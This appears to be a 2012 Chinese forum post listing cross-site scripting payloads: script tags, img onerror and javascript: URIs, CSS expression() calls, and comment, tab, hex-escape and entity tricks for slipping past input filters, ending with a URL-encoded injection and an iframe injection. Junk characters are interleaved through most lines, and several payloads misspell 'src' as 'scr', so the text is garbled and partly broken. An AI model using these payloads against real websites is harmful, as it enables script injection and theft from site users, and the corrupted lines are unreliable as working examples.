<script>alert("跨站")</script> (最常用)
. f* B$ F5 e9 S4 S" s, O& @: F<img scr=javascript:alert("跨站")></img>
5 _8 A* N2 P$ l5 j<img scr="javascript: alert(/跨站/)></img>7 `* A6 G( a7 S9 F5 J/ C5 l1 {: V
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
0 q) p$ P/ G5 B/ k<img scr="#" onerror=alert(/跨站/)></img># A# o1 q7 j1 E4 I; A% L
<img scr="#" style="xss:expression(alert(/xss/));"></img>) C, g/ _3 Y; N @) ~+ M
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)/ \, A3 T1 o: f4 |, R
<img src=vbscript:msgbox ("xss")></img>
2 _1 y) h% v2 ?<style> input {left:expression (alert('xss'))}</style>
; Y) A' B) ]3 M! R<div style={left:expression (alert('xss'))}></div>
; F# e8 p! j: W0 N" ?- T' x<div style={left:exp/* */ression (alert('xss'))}></div>) A5 d9 X8 A6 K: C. v6 z
<div style={left:\0065\0078ression (alert('xss'))}></div>
9 L' s2 w$ o2 f: I; f0 x+ @html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>) C& {/ ~+ w N3 P6 T
unicode <div style="{left:expRessioN (alert('xss'))}">4 e) v- z5 R* b9 m$ b8 r
1 R8 Z, K. }6 I6 O/ _0 E# y
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>[": M) w, |' Q S! p s
|
发表于 2012-9-15 14:09:13
收藏
分享
支持
反对